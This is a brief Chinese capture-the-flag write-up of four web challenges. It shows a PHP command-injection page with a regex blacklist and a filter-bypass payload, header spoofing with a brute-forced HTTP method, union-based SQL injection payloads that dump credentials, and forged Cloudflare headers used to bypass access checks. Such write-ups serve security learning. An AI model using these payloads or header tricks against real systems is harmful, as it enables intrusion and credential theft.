emojictfweb

RCE:

发现f12不能使用,没事,张师傅给我说ctrl+shift+i就可以了,ok.试了试发现没有有用的东西,dirsearch扫描一下发现robots.txt

然后发现 /fl@g.php,查看:

<?phphighlight_file(__FILE__);error_reporting(0);if(isset($_GET['emo'])){   $emo = $_GET['emo'];  if(!preg_match("/\;|\"|\*| |[b-h]|[m-r]|\\$|\{|\}|\^|\>/i",$emo)){    system($emo);  }  else{    echo "Again";    }}else{  echo "Try";}

先进行ls查看,发现flag.txt,然后emo=tail%09??a?.txt进行查看

http:

你的User-Agent必须被服务器识别为EMOJI_CTF_User_Agent_v1.0 只有使用正确的HTTP方法才能获取flag,不同的方法会得到不同的提示。 需要提供正确的自定义头部EMOJI-CTF-Auth且其值为’Passw0rd!’。 全部完成你就能获得flag!!!

在bp上面改然后在http方法上面进行爆破测试是什么方法,发现是PUT方法,然后访问fl1l1l1l1ag.php

e4_sql:

进行访问发现1”时候报错说明是字符形注入

1” order by 2#的时候和 3和4的时候不一样说明有俩列

-1” union select 1,2#发现2是回显位置

然后他没有过滤,直接注就行了

-1” union select 1,database()#
-1” union select 1,(select group_concat(username,password) from information)#

easy_web:

欢迎打开这个题目!

但是你的访问被拒绝了,因为我们采用了和知乎一样的反爬虫策略,而你的访问被认为是违规的爬虫了。

根据提示: User-Agent:Baiduspider

然后:欢迎来自垃圾百度的臭虫子!但是你爬不到什么了,因为本网站现在仅允许来自CloudFlare CDN的流量

那么CloudFlareCDN是什么,要特地提出来呢,不知道就去搜,Cloudflare HTTP 标头(Cloudflare HTTP 标头 ·Cloudflare 基础知识文档)

然后就随便尝试了一下

CF-Connecting-IP:1
CF-IPCountry:1

发现好吧,你来自cloudflare CDN了,但是为了安全,后面的机密内容只能通过洋葱访问(我是怎么知道你是否来自洋葱的呢?这也是CF悄悄告诉我的呀)!

然后去查了查:

CF-Connecting-IP:1
CF-IPCountry:T1

OK完事了。